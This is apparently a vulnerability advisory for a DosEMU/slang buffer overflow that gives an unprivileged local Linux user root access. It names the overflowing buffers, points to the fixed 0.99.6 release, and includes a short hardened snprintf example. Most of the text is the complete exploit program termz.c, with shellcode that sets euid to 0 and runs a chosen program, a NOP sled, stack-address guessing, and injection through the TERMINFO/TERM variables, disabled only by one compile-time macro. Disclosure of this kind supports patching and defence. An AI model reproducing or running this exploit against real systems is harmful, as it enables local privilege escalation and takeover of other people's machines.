DosEMU, a Linux application that lets the Linux operating system run many DOS programs (including some DPMI applications), is vulnerable to a buffer overflow that can be used to obtain root access.
Credit:
The vulnerability and exploit code were provided by: DiGiT and crazy-b!.
DosEMU's home page can be found at: http://www.dosemu.org/.
DosEMU, a program shipped with Linux, is vulnerable to a buffer overflow that an unprivileged local user can use to obtain root access. Because DosEMU is installed world-executable by default (true for most Linux distributions), any malicious local user can reach the overflow and gain root access.
The overflow is caused by writes past the end of two small fixed-size buffers:
1) The 'err_buf[512]' buffer (source code: sldisplay.c, line 1616).
2) The 'file[256]' buffer (source code: sltermin.c, line 229).
The exploit code follows:
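The second overflow is a fixed-size path buffer filled from environment values (TERMINFO and TERM) that any local user controls. As an added illustration of that bug class and its fix, not slang's or DosEMU's own code and not the 0.99.6 patch, the following C shows the unsafe pattern as a comment beside a bounds-checked replacement; the function names and the TERMINFO_FALLBACK directory are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

#define FILE_BUF_SIZE 256   /* same size as the file[256] buffer named above */
/* Fallback directory when TERMINFO is unset; an assumed value for this example */
#define TERMINFO_FALLBACK "/usr/share/terminfo"

/*
 * Unsafe pattern (the bug class described above, not slang's literal code):
 * the TERMINFO and TERM environment values are formatted into a fixed-size
 * stack buffer with no length check, so values longer than the buffer
 * overwrite whatever follows it on the stack.
 *
 *     char file[FILE_BUF_SIZE];
 *     sprintf(file, "%s/%c/%s", tidir, term[0], term);
 */

/*
 * Hardened replacement: validate both inputs, format with snprintf, and treat
 * truncation as a failure rather than silently using a partial path.
 * Returns 0 and fills 'out' on success, -1 otherwise (with 'out' left empty).
 */
int build_terminfo_path(const char *tidir, const char *term,
                        char *out, size_t outlen)
{
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (tidir == NULL)
        tidir = TERMINFO_FALLBACK;
    if (term == NULL || term[0] == '\0')
        return -1;
    /* "%s/%c/%s" needs strlen(tidir) + 3 + strlen(term) bytes plus a NUL */
    if (strlen(tidir) + 3 + strlen(term) + 1 > outlen)
        return -1;
    int n = snprintf(out, outlen, "%s/%c/%s", tidir, term[0], term);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';   /* truncated or failed: never use a partial path */
        return -1;
    }
    return 0;
}

/* Report whether a (TERMINFO, TERM) pair fits a FILE_BUF_SIZE buffer:
 * 1 if the bounded builder accepts it, 0 if it would have been rejected. */
int terminfo_path_fits(const char *tidir, const char *term)
{
    char file[FILE_BUF_SIZE];
    return build_terminfo_path(tidir, term, file, sizeof file) == 0;
}
```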
-- BEGIN termz.c
/*
* dosemu/slang overflow exploit for linux/x86
*
* by DiGiT and crazy-b!
*
* !!! for usage information run the program with no arguments !!!
*
* notez:
*
* with some versions of dosemu, an I/O error will occur when exploiting.
* this means you can not communicate with the prog you run from your
* terminal. after executing you may also need to reset your terminal.
*
* we suggest writing a shell script to secure your root privs, if you
* are not able to communicate with your shell. for this reason we have
* made it possible to specify what you want to execute. you may however
* not add any arguments to that command. this is because there simply
* wasn't enough time for coding!
*
* because dosemu changes its euid to non-root, we have added a little bit
* of code to set this to 0 for you. it can be selected before compiling,
* and should be on by default.
*
* Greetz, #hax, ADM, special greetz to [IG-88]!!
*
* Note: if yah got probs, brute force.
*/
#define PATH_DOSEMU "/usr/bin/dos"
#define DEF_BUFSIZE_1 268
#define DEF_OFFSET_1 911
#define DEF_BUFSIZE_2 1007
#define DEF_OFFSET_2 100
#define UNSET_TERMCAP
#define SET_EUID
#define IQ_LOCKED
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char sc[] =
#ifdef SET_EUID
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" /* set euid - craz */
#endif
"\xeb\x1f\x5e\x89\x76\xff\x31\xc0\x88\x46\xff\x89\x46\xff\xb0\x0b"
"\x89\xf3\x8d\x4e\xff\x8d\x56\xff\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff";
long get_sp ()
{
__asm__("movl %esp,%eax");
}
void usage ()
{
printf("usage: ./sploit type proggie [offset [bufsize]]\n\n");
printf("type must be one of:\t1 :TERMINFO\n\t\t\t2 :TERM\n\n");
exit(0);
}
int main (int argc, char **argv)
{
int bufsize, offset, n, type;
char *buf, *ptr;
long addr;
printf("\n (= DiGiT and crazy-b presents: =)\n");
printf(" (= linux/x86 dosemu/slang overflow =)\n\n");
if (argc < 3 || argc > 5) usage();
type = atoi(argv[1]);
if (type < 1 || type > 2) usage();
bufsize = argc > 4 ? atoi(argv[4]) :
(type == 1 ? DEF_BUFSIZE_1 : DEF_BUFSIZE_2);
offset = argc > 3 ? atoi(argv[3]) :
(type == 1 ? DEF_OFFSET_1 : DEF_OFFSET_2);
n = strlen(argv[2]);
#ifdef SET_EUID
sc[23] = sc[33] = n + 5; sc[15] = sc[30] = n + 1; sc[20] = n;
#else
sc[13] = sc[23] = n + 5; sc[5] = sc[20] = n + 1; sc[10] = n;
#endif
if ((buf = malloc(bufsize + 1)) == NULL) {
perror("malloc");
exit(-1);
}
addr = get_sp() - offset;
memset(buf, 0x90, bufsize);
ptr = (buf + bufsize) - (strlen(sc) + strlen(argv[2]) + 8);
for (n = 0; n < strlen(sc); n++)
*(ptr++) = sc[n];
for (n = 0; n < strlen(argv[2]); n++)
*(ptr++) = argv[2][n];
*(long *)((buf + bufsize) - 4) = addr;
*(long *)((buf + bufsize) - 8) = addr - 16;
printf(";;; type: %s, launching: %s\n",
type == 1 ? "TERMINFO" : "TERM", argv[2]);
printf(";;; bufsize: %i, offset: %i, address: 0x%lx\n\n",
bufsize, offset, addr);
#ifdef UNSET_TERMCAP
unsetenv("TERMCAP");
#endif
#ifndef IQ_LOCKED
setenv(type == 1 ? "TERMINFO" : "TERM", buf, 1);
execl(PATH_DOSEMU, "dos", (char *)0);
#endif
exit(-1);
}
-- END termz.c
DosEMU's developers have been notified and a patch has been released: DosEMU 0.99.6 fixes the hole described above and can be downloaded from:
ftp://ftp.dosemu.org/dosemu/Development/dosemu-0.99.6.tgz
The DosEMU developers' own notes on this bug are available at:
http://www.dosemu.org/docs/README/0.98/README-3.html